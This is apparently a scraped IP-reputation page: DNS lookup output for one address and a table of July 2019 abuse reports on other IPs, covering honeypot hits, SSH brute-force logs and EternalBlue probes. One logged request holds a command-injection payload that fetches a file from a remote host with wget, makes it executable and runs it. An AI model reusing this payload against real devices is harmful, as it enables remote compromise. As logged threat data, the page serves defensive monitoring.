City: unknown
Region: unknown
Country: United States
Internet Service Provider: unknown
Hostname: unknown
Organization: unknown
Usage Type: unknown
b; <<>> DiG 9.10.3-P4-Ubuntu <<>> 164.212.242.144
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 59172
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;164.212.242.144. IN A
;; AUTHORITY SECTION:
. 78 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2022032300 1800 900 604800 86400
;; Query time: 53 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Wed Mar 23 15:02:25 CST 2022
;; MSG SIZE rcvd: 108Host 144.242.212.164.in-addr.arpa. not found: 3(NXDOMAIN)Server: 183.60.83.19
Address: 183.60.83.19#53
** server can't find 144.242.212.164.in-addr.arpa: NXDOMAIN| IP | Type | Details | Datetime |
|---|---|---|---|
| 189.45.37.254 | attack | Honeypot attack, port: 445, PTR: gw.stech.net.br. |
2019-07-23 07:13:20 |
| 68.183.22.90 | attackspam | Honeypot attack, port: 23, PTR: PTR record not found |
2019-07-23 07:09:43 |
| 175.44.32.97 | attack | JunkMail rejected - (printingparters.eicp.net) [175.44.32.97]:64121 is in an RBL: Client host blocked using Barracuda Reputation, see http://www.barracudanetworks.com/reputation/?r=1&ip=175.44.32.97 |
2019-07-23 07:16:38 |
| 157.119.227.103 | attackspambots | [21/Jul/2019:02:36:40 -0400] "GET / HTTP/1.1" Chrome 52.0 UA |
2019-07-23 06:59:15 |
| 217.112.128.142 | attackspam | Spam mails sent to address hacked/leaked from Nexus Mods in July 2013 |
2019-07-23 07:28:48 |
| 81.30.126.103 | attackspam | @LucianNitescu Personal Honeypot Network <<<>>> Donate at paypal.me/LNitescu <<<>>> 2019-07-20 15:38:38,963 INFO [shellcode_manager] (81.30.126.103) no match, writing hexdump (1c30d73d7373b9bc6e88620bf7bf14e0 :2287282) - MS17010 (EternalBlue) |
2019-07-23 07:09:58 |
| 205.209.159.201 | attackspambots | Splunk® : port scan detected: Jul 22 09:56:28 testbed kernel: Firewall: *TCP_IN Blocked* IN=eth0 OUT= MAC=82:c6:52:d1:6e:53:64:c3:d6:0b:ef:f0:08:00 SRC=205.209.159.201 DST=104.248.11.191 LEN=52 TOS=0x00 PREC=0x00 TTL=242 ID=63833 PROTO=TCP SPT=43885 DPT=49152 WINDOW=1024 RES=0x00 SYN URGP=0 |
2019-07-23 06:58:32 |
| 79.54.147.42 | attackspambots | 79.54.147.42 - - [22/Jul/2019:15:09:02 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://206.189.170.165/d%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 166 "-" "ELEMENT/2.0" ... |
2019-07-23 07:05:15 |
| 31.128.22.11 | attack | " " |
2019-07-23 06:48:27 |
| 125.40.199.8 | attackspam | Honeypot attack, port: 23, PTR: hn.kd.ny.adsl. |
2019-07-23 07:17:49 |
| 69.30.213.82 | attackbotsspam | 20 attempts against mh-misbehave-ban on sea.magehost.pro |
2019-07-23 06:49:21 |
| 110.22.55.135 | attackbots | 19/7/22@09:09:33: FAIL: IoT-Telnet address from=110.22.55.135 ... |
2019-07-23 06:50:01 |
| 121.52.145.197 | attack | @LucianNitescu Personal Honeypot Network <<<>>> Donate at paypal.me/LNitescu <<<>>> 2019-07-20 15:38:53,015 INFO [shellcode_manager] (121.52.145.197) no match, writing hexdump (b700a7d86b7fbaf277cf51b638f0e724 :2073382) - MS17010 (EternalBlue) |
2019-07-23 06:54:43 |
| 188.166.241.93 | attackbotsspam | Jul 22 14:25:48 mail sshd\[5690\]: Failed password for invalid user cba from 188.166.241.93 port 53176 ssh2 Jul 22 14:41:53 mail sshd\[6044\]: Invalid user proxyuser from 188.166.241.93 port 40020 Jul 22 14:41:53 mail sshd\[6044\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=188.166.241.93 ... |
2019-07-23 06:44:29 |
| 202.129.188.69 | attack | Jul 22 22:33:11 MK-Soft-VM7 sshd\[29110\]: Invalid user kush from 202.129.188.69 port 51230 Jul 22 22:33:11 MK-Soft-VM7 sshd\[29110\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=202.129.188.69 Jul 22 22:33:12 MK-Soft-VM7 sshd\[29110\]: Failed password for invalid user kush from 202.129.188.69 port 51230 ssh2 ... |
2019-07-23 07:14:29 |